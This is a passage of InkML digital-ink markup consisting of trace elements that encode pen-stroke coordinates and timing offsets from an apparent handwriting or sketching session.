0,0-2-1 0,0 0-2 16,-2 1-2-16,2 1 7 0,-1-1-1 0,-1 1-1 15,2 3 4-15,0 1 0 0,-2-3-3 0,0 2-2 16,0 2 3-16,-2-2-2 0,0 3-3 0,1-4 5 16,-1 1-2-16,-1 3 3 0,1-3-1 0,0 1-3 15,-2 0 4-15,2-3-2 0,-2 0 3 0,2-2 0 16,0 2 0-16,0 0-7 0,-4-4 5 0,4 2 1 16,0-5 0-16,-3 6 4 0,3-6 2 0,-1 4-6 15,1-4 0-15,-2 4 0 0,2-4 1 0,0 0 2 16,-1 3 1-16,1-3-4 0,0 0-6 0,0 0-5 15,0 0-29-15,0 0-40 0,0 0-27 0,0 0-24 0,0 0-19 16,1-13-116-16,-1 8-284 0,2 0 126 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="144743.2734">14406 10497 12 0,'0'0'85'0,"0"0"-5"0,1-3-15 0,-1 3-3 16,4-3 3-16,-4 3-2 0,0 0-11 0,0 0-1 16,0 0 4-16,0 0-1 0,0 0-2 0,0 0 11 15,0 0-22-15,0 0 21 0,0 0 3 0,-4-5 4 16,4 5-6-16,0 0-10 0,-4-3 4 0,4 3 4 16,-7-5-2-16,3 2 6 0,-1 1-12 0,-2-2 1 15,2 0-13-15,-5 1-1 0,1-1 5 0,1 1-1 16,1 1 3-16,-5 0-3 0,5 0-3 0,-2 1-2 15,-3-1-3-15,5 2 1 0,-1 2-7 0,-3 0-1 16,-1 2-4-16,0 1 1 0,1 1-5 0,-3 4 1 16,-4 2-6-16,5 1 3 0,5-4-2 0,1 2-1 15,-1 2-6-15,3-2 7 0,-3 1-4 0,3 3-3 16,4-5-2-16,-3 1 6 0,4 1-3 0,0 1-5 0,2-4 5 16,-2-2-1-16,2 5-2 0,3-4-3 0,-1 1 3 15,-2-3-4-15,5 0 3 0,-2-1-1 16,4 3-4-16,0-5 1 0,-3-2-1 0,6 3 2 15,-1-3-3-15,-2-1 1 0,2 0-3 0,0-1 2 0,-1-3-1 16,3 1 4-16,1-7-2 0,-4 3 0 0,2 1-3 16,-1-2 0-16,-2 1-2 0,-1-1 3 15,-2-1 0-15,3 0-3 0,0 2 4 0,-4-2-3 16,4 4-2-16,-5-1 4 0,1 1 0 0,-1-1 0 0,0 0-1 16,0 3 1-16,-3-2 1 0,1 0-4 0,1 2 2 15,-3 3-2-15,1-5 1 0,2 4 2 0,-3 1-5 16,1-7 4-16,-1 7-3 0,0-4 0 0,0 4 0 15,0 0 4-15,0 0-4 0,0 0 4 0,0 0-1 16,0 0-4-16,0 0 4 0,0 17 4 0,-1-9-6 16,-2 1 3-16,2 2 0 0,-4 0 2 0,1 0-1 15,-1 1 1-15,2 3 0 0,2-5-3 0,-4 1 1 16,2-2-2-16,2 1 4 0,1-3 0 0,-1 1-1 16,2 0-6-16,-1-2-7 0,0-1-33 0,0 3-15 15,1-2-17-15,6 0-31 0,-2 0-19 0,-1-2-19 16,1-3-128-16,1 1-298 0,1-1 132 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="144990.4963">14608 10588 112 0,'-4'6'138'16,"-1"-3"-10"-16,-1 4 1 0,3-1-8 0,-2-2-7 16,1 3-15-16,-1-2-6 0,3 1-4 0,-2-1-5 15,1 1-8-15,0 2-4 0,0-2-13 0,0 1-1 16,0 0-11-16,1 0 1 0,2 0-11 0,-2-1-7 16,0-2-23-16,2 1-24 0,2 2-34 0,-2-4-3 15,2-1-28-15,-2 1-19 0,0-3-20 0,2 3-66 16,-2-3-200-16,0 0 89 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="145261.1887">14699 10341 50 0,'0'0'123'0,"1"-4"-13"0,-1 4-9 16,0 0-1-16,0 0-5 0,0 0-12 0,0 0-2 16,0 0 2-16,5 9-3 0,-3-4-8 0,-1-1-6 15,-1 2 3-15,1 1-4 0,1 3-9 0,-2-3-6 16,2 3-5-16,-2 0-3 0,0 3-5 16,0-2-5-16,0 2-3 0,0-1-5 0,1-1-7 0,-2 2-7 15,1-2-29-15,0 0-24 0,0-1-17 0,0-1-9 16,1-2-12-16,0 0-7 0,1 0-17 0,-1-1-72 15,0-1-190-15,0 2 85 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="145576.4799">14713 10695 33 0,'-4'5'95'0,"4"-1"-7"15,-1 2 5-15,0-2-3 0,-1 0-10 0,1 1-8 16,1-2 16-16,0-3-17 0,-1 5 5 0,1-5-3 16,-2 6-7-16,2-6-1 0,2 4-5 0,-2-4-4 15,0 0-5-15,0 0 1 0,2 2-12 0,-2-2 5 16,0 0 1-16,10-1-4 0,-10 1-9 0,14-9 1 16,-3 5-2-16,5-6-1 0,-2 1-6 0,4-1 0 15,0 1-2-15,-4 0-8 0,5-2 7 0,-6 0-2 16,5 2-8-16,-8 3 4 0,4-4-3 0,-2 4-4 15,-2 0 0-15,-2 1-1 0,-1 1 3 0,1 1-1 16,-3-1-4-16,-1 2-1 0,0 0-1 0,-4 2 1 0,7-3 2 16,-3 0-7-16,0 3-3 0,-4 0-11 15,0 0-33-15,12 0-25 0,-6 0-18 0,-6 0-21 16,8 4-24-16,-6-1-80 0,1 0-232 0,-1 1 103 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="145874.685">15348 10614 124 0,'-4'-4'150'0,"-2"1"6"0,3 0-4 0,-5 2-14 15,0-1-11-15,-1 2-14 0,-3 2-10 0,-6 2-9 16,4 3-13-16,-4 1-5 0,0 3-2 0,4-2-10 16,-1 2-8-16,2 0-8 0,2 2-3 0,-1 0-11 15,6-2-28-15,1 3-40 0,2 0-30 0,1-2-38 16,2 3-33-16,-2-3-83 0,1-1-236 0,4-1 104 15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="146211.1703">15396 10708 26 0,'0'-7'181'0,"-2"6"-9"0,2 1 6 0,-3-9-10 0,1 6-4 15,2 3-4-15,-8-3-16 0,6 1-12 0,2 2-13 16,0 0-10-16,-8 0-6 0,8 0-14 0,-7 7-7 16,4-6-7-16,0 3-10 0,1 2-8 0,0 0-3 15,2-1-4-15,2 1-4 0,3 5-7 0,0-1-4 16,-1-3-3-16,2 2-2 0,2-2-1 0,3-1-4 16,-1 1-4-16,4-3-5 0,-1 0-2 0,-2 0 3 15,1-1-5-15,-1 1-1 0,0-4 3 0,-5 0 1 16,2-2-2-16,-3 0-6 0,3-1 3 0,-7-1 3 0,3-2-2 15,-4 0 9-15,4-3-4 0,-9-4 0 16,2 3-1-16,-3 0 1 0,-2 0 0 0,0 1-4 16,-7-4-3-16,2 2 2 0,3 3-2 0,-3 2-1 0,4 1-4 15,-5-3-6-15,5 4-12 0,3 2-41 0,-2 0-42 16,3 0-51-16,3 0-29 0,2 2-24 16,0 0-132-16,0 0-361 0,0 0 160 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="146456.9893">15892 10352 108 0,'3'-4'176'0,"-3"4"-7"15,1-5-3-15,-1 5-6 0,0-4-10 0,0 4-11 16,0 0-7-16,0 0-11 0,0 0-4 0,0 0-4 15,-4 16-6-15,0-6-10 0,-2 8-4 0,-5 9-7 16,-3 0-6-16,-3 1-11 0,-1 1-4 0,-4 2-4 16,-4 7-9-16,-5 0-4 0,8-10-7 0,2 0-7 15,-2 1-11-15,3-2-32 0,-1 1-36 0,2-5-31 16,3 0-44-16,2 1-46 0,3-2-167 0,4-4-359 16,3-2 160-16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="146882.9559">15909 10739 29 0,'-8'4'132'0,"3"-1"-11"16,-4 2-13-16,0 3-6 0,4-2-4 0,-2 4-2 15,0-2-14-15,3 3-5 0,-1-4-1 0,1 5-4 0,3-2-18 16,1-1 2-16,0-1-10 0,0-1-6 16,1 4 4-16,3-5-4 0,1 5-7 0,-1-6-2 15,3 4-3-15,-2-4-1 0,2-2-5 0,6 0 0 0,-4 2-6 16,0-1 10-16,6-3-1 0,-3 0-4 0,-1-1-8 15,2-2 3-15,-4 1 6 0,2-2-1 0,-1-1 2 16,-4 2 3-16,0 0 13 0,4-3-3 16,-4-1 4-16,-3 1 4 0,0 1 4 0,1-4-3 0,-4 1 0 15,0-2-8-15,0-2-2 0,0 2 8 0,-4-1-4 16,3 1-6-16,-2-1 4 0,-1 3-5 0,2 0-5 16,0 0-3-16,-3 1 1 0,3 1-5 0,-2-2-9 15,0 4-16-15,0 0-32 0,3 0-38 0,1 3-40 16,-4-5-16-16,4 5-17 0,0 0-7 0,0 0-119 15,0 0-295-15,17 3 131 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="147277.0217">16258 10792 95 0,'0'0'110'0,"0"0"-14"0,4 4 2 0,-2-1-2 16,-2-1 10-16,0 5-12 0,0-1-9 0,0 5 4 16,-2 1 7-16,-2 2-5 0,-3 3-9 0,-1-2-2 0,-1 2-6 15,0 1-1-15,-5 4-16 0,5-7 7 16,-3 1-7-16,5-1-9 0,-1-2-2 0,0-4-5 16,4 1 0-16,2-1-5 0,-1-4-2 0,-2 2-5 0,4-1 0 15,-2-3-7-15,2 0 1 0,1 1-4 0,0-4 4 16,0 0-5-16,1 5 0 0,-1-5-3 0,0 0-6 15,23-12-3-15,-9 7-5 0,0-7 3 16,1 3-8-16,0-3 3 0,0 2-4 0,0-1 3 16,1-1-8-16,2-1 6 0,5-1-3 0,-8 0-2 0,9 0-2 15,-1 0 1-15,-2 3 1 0,-3 4-1 0,8-3 4 16,-6 8-3-16,0-4 1 0,0 3-2 0,1 2 8 16,-1 0-5-16,2 1 9 0,-4 1-3 0,3 2 0 15,-2 1-5-15,-4-1 3 0,-1-3 0 0,-2 3-1 16,-1 1 0-16,2 1 0 0,-4-1-7 0,-1-3-16 15,0 1-10-15,-4 5-31 0,1-3-27 0,-1 1-23 16,-3-2-133-16,-1 0-271 0,0-3 121 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="147889.81">14272 10693 76 0,'-6'4'91'0,"-1"0"-8"0,1 2-9 0,-2-3-4 15,0 5-11-15,1 0-14 0,-1-2-11 16,-1 4-17-16,4-4-15 0,0 1-19 0,1 0-11 16,0-2 4-16,4 3-3 0,-1-2 1 0,-2-1 5 0,3 0-1 15,4 1 2-15,0 2 2 0,-3 0 6 0,6 0-3 16,-1 0 9-16,3 2 0 0,-1 1-8 16,-1-2 5-16,7 7-2 0,-1-6 8 0,4 2-2 15,-1 1 3-15,2-2 8 0,5 1 2 0,4 1 7 0,0-1 4 16,1-1 5-16,0-1 10 0,0 1-1 0,2 2-1 15,0 1 6-15,-2-2 8 0,3 5 0 0,-3-1 2 16,-1 0 11-16,0 1 12 0,0-2-2 0,-3 1 1 16,2 2-10-16,-1-1-1 0,3 0 4 0,-1-1-5 15,-1 0-5-15,1 0-2 0,-1-2-3 0,3-1-6 16,-3 1-3-16,1-3 2 0,0-1-8 0,-8-3-2 16,8 1 1-16,1-1-2 0,-6-4-12 0,-3 2 0 15,2-1 2-15,0-4-7 0,-1 0-22 0,1 0-9 16,-7-1-19-16,-4-1-24 0,3 1-13 0,-4-1-20 15,-5-1-18-15,0 0-87 0,-4 0-213 0,0 3 95 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="148073.3452">14396 11225 67 0,'0'0'68'0,"0"0"-2"0,15 5-12 0,-2-5-3 16,9 2-7-16,8-1 0 0,1-1-5 0,4 2-5 15,0 0-8-15,6 0-16 0,-4-6-19 0,-1 4-21 16,-3-2-48-16,-5-1-84 0,-5 1 38 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="151653.1763">13961 11091 31 0,'0'0'36'0,"0"0"1"0,0 0 2 16,0 0 0-16,0 0-4 0,0 0 6 0,0 0-6 15,0 0 9-15,0 0-7 0,0 0-6 0,0 0 9 16,0 0 4-16,0 0 12 0,0 0-10 0,-1 14 6 15,1-9-6-15,-4 0 8 0,-1 2-2 0,1 0-11 16,0 3 5-16,-1-3-5 0,0 1 6 0,0 0-1 16,1-2-2-16,-1 1-2 0,1-1-15 0,-1-1 13 15,0 1-1-15,-1-1-11 0,3-3-3 0,1 2 1 16,-2 1 1-16,2-3-11 0,2-2 11 0,-2 4-9 16,2-4 3-16,-3 2-9 0,3-2 7 0,0 0-7 15,0 3 2-15,0-3 0 0,0 0-2 0,-4 4-4 16,4-4 6-16,0 0-3 0,0 0 3 0,0 0-5 15,0 0 7-15,0 0-7 0,0 0-4 0,15-6-2 16,-8 5 6-16,5-1 0 0,-1-4 0 0,-2-1-6 16,5 3 2-16,-2 1 1 0,-2-4-4 0,4 2 1 15,0 1 0-15,-1-1 0 0,4 0 1 0,-5 1-4 16,0 1 0-16,-2 0 3 0,0 0-1 0,-1-1 2 16,-1 4-5-16,-1-2 2 0,-1 2 4 0,-1-2-8 15,-5 2-2-15,0 0 8 0,9 2-7 0,-8 0 7 0,2 2 6 16,-5 0-8-16,2 4 4 0,-1 3-4 15,-3-3 2-15,0 3-3 0,-2 1-2 0,1-3 5 16,0 3-1-16,0-5-3 0,-1 2 8 0,3-1-5 16,-1 1-7-16,0-3 6 0,0-2-2 0,3 3-1 0,-2-2 10 15,2-1-2-15,1 1-10 0,1 0 14 0,3-1-10 16,-3-2-3-16,3 1-3 0,3-1 12 0,-1 0-9 16,5-1 5-16,2-1 1 0,-2 0-5 15,1-3 2-15,1 0 5 0,6-1-9 0,-1-2 0 0,0 0 4 16,-5 3-3-16,1-2 3 0,1-1 0 0,-1 1 3 15,-3 2-2-15,0-1 1 0,-2 0-5 0,-3 1 6 16,1 0-6-16,-1 1 4 0,0 0 0 0,-2 1-3 16,0 0 2-16,-4 1 0 0,0 0-1 0,8-3-1 15,-8 3 3-15,0 0 2 0,6 5 2 0,-6-3 1 16,0 3 6-16,-2 1-1 0,0 1-6 0,0-2 6 16,-1 5-5-16,1-5 10 0,0 4-5 0,-1 1-2 15,-1-2-3-15,1 0 2 0,-1-3-2 0,2 1-1 16,-1 0 3-16,2-1 1 0,0 0-9 0,-1-1-11 15,4 1-14-15,-4-2-26 0,4 0-29 0,-2-3-29 16,2 4-31-16,-2-4-92 0,0 0-250 0,10-1 110 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="151864.2812">14540 11072 156 0,'-9'3'198'16,"-2"0"-1"-16,1 2 3 0,1 1 2 0,-4 1-5 15,3 0-10-15,-1 0-13 0,1 1-15 0,0-1-17 16,2 3-15-16,-2 0-11 0,1 4-12 0,3 0-11 16,-1 3-19-16,0-2-27 0,3 3-48 0,0 1-54 15,4-3-59-15,0-1-48 0,5 1-179 0,-1-4-368 0,5-3 163 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="152077.6214">14765 11239 126 0,'-11'-4'180'15,"0"2"-5"-15,-6 1-2 0,-4 1-5 0,2-2 5 16,-1 4-8-16,-2-1-10 0,4 1-12 0,-4 3-19 16,4 0-9-16,4 2-10 0,-4-1-12 15,7 1-13-15,2 3-14 0,2 0-32 0,2 2-47 0,3 3-52 16,3-3-60-16,7 3-187 0,-2-3-338 0,4 2 149 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="152465.4857">14846 11420 71 0,'-3'-3'217'0,"2"0"-4"16,1 3-6-16,-3-6-4 0,3 6-3 0,-4-3-8 15,4 3-13-15,0 0-6 0,4-4-24 0,-4 4-18 16,3-3-14-16,-3 3-5 0,6-4-14 0,7 0-7 15,4-2-15-15,3 1-6 0,1-2-7 0,8 0-7 16,-2 1-9-16,-6-2-9 0,0 5-11 0,-1-4-9 16,2 2-11-16,-5 1-6 0,1 1-4 0,-7-2 0 15,1 4-1-15,-5 0-5 0,0-2 14 0,-2 1-5 16,-1 1-1-16,-4 1-1 0,3-4-2 0,-3 4-1 16,0 0 2-16,-17-2-2 0,5 2 1 0,-7 2 2 15,-3 2-1-15,-7 3 0 0,-4 0 4 0,3 0-2 16,-3 2 1-16,4 0 1 0,2 1 1 0,9-3-3 0,1-1 2 15,6 0-4-15,3-1 1 0,2 0 2 0,2-1 1 16,1 3 0-16,7 2 0 0,1-1-2 16,9 3 4-16,1-1 0 0,5-4-1 0,9 3 0 15,2-3-1-15,-2-1-5 0,3 1-5 0,0-3-12 0,0-1-22 16,-3 0-21-16,0 0-29 0,-8-1-42 0,7-5-40 16,2 1-189-16,-11 3-392 0,0 0 174 15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="154092.615">13928 9074 37 0,'-18'-19'56'0,"-2"2"-3"0,-2-2-7 0,-2 3-3 15,-2-2-5-15,-2 4 3 0,-4-2-6 16,-4 3 2-16,-11-3-5 0,-3 3 2 0,0-3-4 16,-1 9-2-16,-2-1 5 0,-5 4-13 0,-2 1-3 0,1 1 0 15,-2 1 1-15,1 2 7 0,-2-1 2 0,4 1-7 16,-1 0 6-16,3 1-7 0,-2-1 4 0,3 2 8 15,-1 1-11-15,2 0 4 0,2-1 4 16,-2 2-5-16,2 1-1 0,-3 1-8 0,-4 5 0 0,0 1 10 16,-3-2-8-16,-2 4 5 0,1 1 9 0,-1 0-17 15,-21 12 2-15,27-9 3 0,-5 2-7 0,6 1 5 16,2 4-13-16,3 0 8 0,2 4 0 0,1-1 3 16,2-1-8-16,3 0 3 0,4 3 1 0,4 2 4 15,1 0-8-15,2 2 5 0,10-7-4 0,-5 15 3 16,2 0 6-16,5 0-6 0,-2 4 4 0,4 2 1 15,0 2 9-15,3-2-12 0,6 0 2 0,3 6-3 16,5 0 8-16,3 4 2 0,5 0-7 0,7 0 4 16,13 23-1-16,-5-27 1 0,6 0-1 0,22 22 0 15,-13-26 5-15,19 16-13 0,2-2 6 0,-16-17-11 16,31 21 12-16,-5-1-2 0,10-1 3 0,2-3-7 16,4 1 7-16,2-1-6 0,2 1 0 0,-2-1 0 15,2-2-1-15,1 2 4 0,-6-6-15 0,4 0 7 16,2 1 3-16,-5-2 2 0,-1 2-5 0,-2-8-1 15,1 0 0-15,-2-5-1 0,-4 0 0 0,-18-14 1 16,23 13-1-16,-24-16-1 0,3 2-4 0,24 6 4 16,0-3 3-16,-23-11-3 0,26 4 1 0,-26-8 1 15,28 1-5-15,-28-11-5 0,4 3 3 0,28-2 2 16,-30-6-5-16,1-1 0 0,3 0 7 0,24-6-3 16,-27 0 1-16,2-2 7 0,2-1 4 0,-1-2 1 15,26-6-1-15,-33 7 3 0,1 0 6 0,-4 0 2 16,4-2 4-16,-4 0 5 0,3 1-7 0,-5 0 2 15,4-1-2-15,-1 1 3 0,-1 1-2 0,-1-3 1 0,-2 3-1 16,-2-1 0-16,-1 2-7 0,-11 0 1 16,14-3-1-16,-15 5-2 0,2-5-1 0,-1 2-5 0,11-3 1 15,-13 1 1-15,1-2 0 0,-2-1 1 16,1 0-12-16,-5-1 9 0,0 0-1 0,0 0-1 16,-2-2 1-16,0-2-2 0,0 1 0 0,0-2-2 0,-3 0 1 15,-3 1-2-15,1-1 6 0,-2-6-4 0,1 5 0 16,0-3 2-16,-4 1-5 0,6-4 4 0,-3 2-7 15,-4-2 3-15,3-1 8 0,0 3-9 0,-3-4 2 16,-1 1 2-16,0 1-3 0,-1-6 0 0,-2 5 5 16,0-6 1-16,6-15-5 0,-4 1 2 0,-2 3 3 15,-3-5-6-15,2 0-3 0,-1-4 4 0,1 2-2 16,0-6 1-16,-1 4 1 0,-1-3-1 16,-3-4 0-16,1 2 3 0,-4-2-5 0,-1-2-2 0,0-22-1 15,-3-1 4-15,-2 0-1 0,-3 0-4 0,-1 0-1 16,-7 2-3-16,-3 2 7 0,-2 25-5 0,-11-33 0 15,-6 2 0-15,-9 0-2 0,-4 1 0 0,-10-2-2 16,-7 10-7-16,-1-3 1 0,-7 4 5 0,-8 4-6 16,2 4 0-16,-4 8 4 0,-7 1-3 0,-9 3-9 15,-3 3-5-15,-1 5-16 0,-1 6-10 0,0 7-22 16,-3 10-6-16,0 2-24 0,-6 8-10 0,-4 9-24 16,-3 8-9-16,1 4-90 0,-2 3-258 0,2 8 115 15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="167449.9364">8434 10033 19 0,'0'0'81'0,"0"0"-5"0,0 0 3 0,0 0-2 16,0 0-3-16,0 0-5 0,0 0-4 0,0 0-1 0,0 0-4 16,0 0-3-16,0 0-3 0,0 0 0 0,0 0-7 15,0 0-2-15,0 0-3 0,0 0 5 0,0 0-11 16,0 0-1-16,0 0-4 0,0 0-9 15,0 0 6-15,0 0-8 0,0 0 5 0,0 0-8 0,21 3 1 16,-10 1-4-16,3-3 5 0,5 3-2 0,-1-1 2 16,5 3-10-16,3-1 7 0,-1 1-4 15,6 0 7-15,-2 1-4 0,3 0 5 0,4-2-9 0,-3-1-1 16,3 3-1-16,0-1 1 0,1 1 0 0,0 1 0 16,3-1-3-16,9 1 3 0,-9 0-3 0,12 1-1 15,-2 2 2-15,4 1 6 0,1-4 0 0,0 1-5 16,-3 4-3-16,-3-2-1 0,3 0-5 0,-1 2 3 15,-1-3 0-15,-12-3-1 0,15 5 1 0,-14-5-4 16,11 2-10-16,-11 0 5 0,13 2 5 0,-12-4 9 16,9 3-5-16,-12-5 0 0,3 3-2 0,15 1 1 0,-1-3 0 15,0-1 7-15,-1-3-5 0,-2 3 0 16,-1-4 0-16,-13 1-2 0,4-1 1 0,11 2-6 16,-12-2 1-16,-3-2-2 0,-1 2-5 0,2-1 9 15,-1 0 2-15,-1 2 8 0,-4-1-8 0,1 1-4 0,-2 0 10 16,-2 0-9-16,-7 0 0 0,-3 0 3 0,2 3-6 15,-2-4 3-15,0 1 5 0,-2-1-5 0,3 1 4 16,-6-1-1-16,-1 2 4 0,0 0 0 0,-4-2-5 16,-3 0-4-16,3-1 2 0,-1 4-2 0,-2-3 5 15,-1-1-4-15,-1 2-15 0,0 0-39 0,0 3-46 16,-5-1-136-16,-3 2-256 0,-5 5 114 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="173089.5089">2766 10084 46 0,'-5'-6'55'0,"0"0"-4"0,1-1-5 0,-1 6 3 15,1-3-14-15,0-2 3 0,-1 2-5 0,4-1-1 16,-4 1 2-16,1-1 1 0,0 1 0 0,3 1 4 15,-2 0-10-15,3 3-3 0,-6-2-3 0,3 0-7 16,3 2 6-16,-5-4-1 0,5 4 5 0,-5-3-8 16,5 3 17-16,0 0-22 0,-5-3-3 0,5 3 5 15,0 0-12-15,0 0 11 0,0 0-17 0,0 0 7 16,0 0 4-16,0 0 0 0,0 0-1 0,0 0-7 16,0 0 0-16,0-3 2 0,0 3-3 0,0 0-1 15,0 0 4-15,0 0-5 0,0 0 6 0,0 0-8 16,0 0-2-16,0 0 10 0,0 0 1 0,0 0-7 15,0 0 3-15,0 0 0 0,0 0-2 0,0 0-3 16,0 0 4-16,0 0-9 0,0 0 1 0,0 0-3 16,0 0 3-16,0 0-1 0,0 0-1 0,0 0 1 15,0 0 2-15,0 13-3 0,0-9 5 0,0-1-8 16,4 0-19-16,1 4 0 0,-4 0-10 0,4 1-3 16,-1 3-45-16,4 1-98 0,-3 4 43 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="174751.3323">5514 11262 28 0,'-7'-1'25'0,"2"-2"3"15,0 0-8-15,0 2-5 0,-3 0 5 0,3-1-4 16,0 1-4-16,5 1 2 0,-10-3 4 0,6 2-6 16,4 1 3-16,0 0-10 0,-8-2 4 0,8 2 5 15,-4-1-3-15,4 1 1 0,0 0-2 0,0 0-4 16,0 0 1-16,0 0 1 0,-6-1 2 0,6 1 4 16,0 0-7-16,0 0 8 0,0 0 5 0,0 0-2 15,0 0 6-15,0 0-1 0,0 0 0 0,0 0 6 16,0 0-2-16,0 0 7 0,0 0-8 0,-4-5 1 15,4 5 14-15,0 0-6 0,0 0-1 0,0 0-2 16,0 0 0-16,0 0 5 0,0 0-6 0,0 0-8 16,0 0 8-16,0 0-3 0,0 0-9 0,0 0-4 15,0 0 6-15,0 0-9 0,0 0-4 0,0 0 1 16,0 0 5-16,0 0-3 0,0 0-9 0,0 0 5 16,0 0-8-16,0 0 1 0,0 0-5 0,0 0 0 15,0 0 8-15,0 0-12 0,0 0 1 0,0 0 4 16,0 0 2-16,0 0-3 0,0 0-3 0,0 0 6 15,0 0-4-15,0 0 5 0,0 0-2 0,0 0 3 16,0 0-3-16,22 5 3 0,-22-5 0 0,0 0-4 16,0 0 3-16,4 2 1 0,-4-2 2 0,0 0-2 15,0 0 9-15,0 0-10 0,0 0-1 0,0 0 2 16,0 0 1-16,0 0 1 0,0 0 0 0,0 0-4 16,0 0-1-16,5 0 6 0,-5 0-7 0,0 0 4 15,0 0-9-15,0 0 10 0,0 0-6 0,0 0 0 16,0 0 6-16,0 0-3 0,0 0 2 0,0 0 11 15,6 2-6-15,-6-2-6 0,0 0 6 0,0 0-6 16,0 0 0-16,0 0 7 0,0 0-5 0,0 0 1 0,0 0-9 16,0 0 12-16,0 0-4 0,0 0 2 15,0 0 2-15,0 0-2 0,0 0-3 0,0 0 0 16,8 1-1-16,-8-1 3 0,0 0 2 0,5 0 0 16,-5 0 4-16,0 0-8 0,0 0 5 0,9-1 2 15,-9 1-2-15,0 0-1 0,5-1-3 0,-5 1 2 0,0 0-8 16,0 0 9-16,0 0-2 0,8 1 4 0,-8-1-10 15,0 0 7-15,0 0 5 0,0 0-11 16,0 0 3-16,5 1-3 0,-5-1 6 0,0 0-8 16,0 0 6-16,0 0 0 0,9 0-1 0,-9 0 4 0,4 2-4 15,-4-2 5-15,0 0-8 0,9 1 7 0,-9-1 3 16,5 2 2-16,-5-2-16 0,5 0 4 0,-5 0 4 16,0 0 2-16,8 0-4 0,-8 0-5 0,0 0 6 15,0 0-3-15,6 1 12 0,-6-1 0 0,5 1-6 16,-5-1 4-16,6 1-8 0,-6-1 2 0,8 0-1 15,-8 0 2-15,8 2-4 0,-8-2 9 0,7 0-7 16,-7 0 9-16,9 0 3 0,-5 1-15 0,-4-1 10 16,9 1-3-16,-4 1 5 0,2-1-10 0,-2 0 5 15,-5-1 3-15,10 2 2 0,-5 0-6 0,0-1-3 16,-5-1 2-16,9 3-4 0,-4-3 5 0,-5 0 3 16,8 2-4-16,-8-2-5 0,7 2-1 0,-7-2 11 15,8 1-1-15,-8-1 4 0,8 1-7 0,-3-1 1 16,-1 1-2-16,-4-1 5 0,8 2 1 0,-8-2-2 15,7 0-4-15,-7 0 7 0,7 1 1 0,-7-1 5 16,6 0-10-16,-6 0 4 0,0 0-2 0,4 1 0 16,-4-1 1-16,0 0 9 0,0 0-12 0,10 0 1 15,-10 0 8-15,0 0 0 0,0 0 3 0,5 1-3 16,-5-1 4-16,0 0-2 0,0 0 3 0,7-2 0 16,-7 2 4-16,0 0-5 0,0 0-2 0,0 0 5 15,0 0-4-15,0 0 0 0,0 0-7 0,0 0-33 16,0 0-48-16,0 0-49 0,0 0-106 0,1 6-246 15,-1-6 109-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="179448.9162">5451 11172 30 0,'0'0'29'0,"0"0"-2"15,0 0-4-15,0 0 0 0,0 0 2 0,0 0-3 16,0 0-2-16,0 0-5 0,0 0-2 0,0 0 0 16,0 0-6-16,0 0 8 0,0 0-7 0,0 0 1 15,0 0-5-15,0 0 1 0,0 0 0 0,0 0-4 16,0 0 6-16,0 0-7 0,0 0 2 0,0 0 1 16,0 0-3-16,0 0 0 0,0 0 2 0,0 0-4 15,0 0 5-15,9 8 0 0,-9-8-2 0,4 2 0 16,1-1 5-16,-5-1-7 0,5 4-3 0,-1-1 8 15,-3 1-8-15,3-3 6 0,-4-1-4 0,5 2 0 16,-1 0-1-16,-4-2 10 0,8 2-7 0,-6 1 3 16,-2-3-3-16,8 4 5 0,-4-3-8 0,-4-1 10 15,5 1-5-15,-5-1-1 0,5 1 10 0,-5-1-6 16,5 3 7-16,0-3-1 0,-5 0-2 0,0 0-1 16,8 0 5-16,-4 2 2 0,-4-2 2 0,6 0 6 15,-6 0-4-15,8 0 3 0,-8 0 5 0,12 0 3 16,-6 0 0-16,0-2-1 0,2 2 3 0,-1-3-2 15,0 2-2-15,0 0-5 0,1-3 16 0,-2 4-21 16,-6 0 1-16,9-2-3 0,-5 0-4 0,1 1-2 16,-5 1-2-16,12-1 8 0,-6 1-1 0,1-2-2 15,-1 2-5-15,-6 0-4 0,14 0 11 0,-9-2 12 16,-5 2-25-16,13 0 9 0,-13 0 0 0,11 0-6 16,-4-1 2-16,-2 1-7 0,-5 0 4 0,9 0 3 15,-4 0-5-15,-5 0 8 0,10 0-4 0,-3 0-6 16,-7 0 2-16,10 1 2 0,-5 1-2 0,-5-2 1 15,11 0 2-15,-5 0-2 0,0 2-3 0,0-2 0 16,2 1-3-16,-2 0 12 0,1-1-7 0,1 2-2 16,-1-1-8-16,-1 0 14 0,2 2-8 0,0-2 7 15,1 0-9-15,-2-1 13 0,1 1-6 0,1 1 5 16,-3-1 3-16,2-1 0 0,1 2-8 0,0-2 9 16,1 0-7-16,-2 0 3 0,0 0 2 0,3 1-2 15,-6-1 0-15,4 1 9 0,0-1-3 0,0-1 0 16,-1 1 6-16,-2-1-6 0,1 1 1 0,-7 0 6 0,14 0 2 15,-9 0 3-15,-5 0 4 0,7-2 2 0,-7 2 2 16,6 0-1-16,-6 0 4 0,4-1-5 16,-4 1-1-16,6-3 3 0,-6 3-3 0,0 0-2 15,3-2-3-15,-3 2-13 0,0 0-32 0,0 0-40 16,0 